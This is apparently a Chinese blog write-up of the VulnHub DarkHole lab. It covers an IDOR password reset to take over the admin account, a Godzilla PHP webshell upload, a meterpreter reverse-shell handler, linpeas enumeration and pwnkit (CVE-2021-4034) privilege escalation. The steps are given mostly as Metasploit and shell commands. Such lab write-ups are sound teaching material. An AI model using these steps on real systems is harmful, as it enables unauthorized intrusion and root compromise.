Vulnhub靶机DarkHole -Linux提权

环境搭建: DarkHole: 1 ~ VulnHub

脚本工具下载GitHub - peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

1、信息收集:

  • 先看下自己的虚拟机网段,CHCP设置
  • 我这里是192.168.0.0/24网段
  • Nmap扫描 nmap 192.168.0.0/24 获取到Ip

2、Web漏洞利用:

  • 注册账号登录网站
    更新密码,抓包修改id
    1就是admin 用户
  • 登录admin用户发现多了一个上传文件的选项
  • 哥斯拉生成php脚本。命名为1.phtml,然后上传脚本
  • 哥斯拉连接
  • 通过哥斯拉上传脚本工具这里不建议在哥斯拉里面直接执行脚本。因为它的webshell反弹不太好用
  • 反弹shell到msf 利用哥斯拉里面的PM模块,输入kali的Ip 与接受的端口。然后对着敲命令就行了
use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

然后点击load、go反弹shell

3、内核提权

  • 由于之前在哥斯拉上传了,这里就不用再上传了。
    执行提权脚本
shell
cd /tmp
chmod +x linpeas.sh
./linpeas.sh

  • 这里我们用 cve_2021_4034
  • 用msf的模块检测一下。看msf是否有自带这个漏洞利用
background //退出shell状态
use post/multi/recon/local_exploit_suggester //使用提权漏洞检测模块
sessions //查看session
set session 1 //设置session
run //开始检测

由于我这是msf社区版 没有找到可以利用的提权漏洞

  • 但是我们刚刚利用脚本工具检测出可以利用cve_2021_4034
    Msf搜索一下看是否有这个利用
    search cve_2021_4034
    这里msf有我们就自己用
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec//使用这个模块
set session 1 //设置session,这里session为之前得到的
run //开始执行
  • 提权成功

    如果msf没有这个漏洞或者利用失败的话。就去网上找其他的利用上传上去。
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值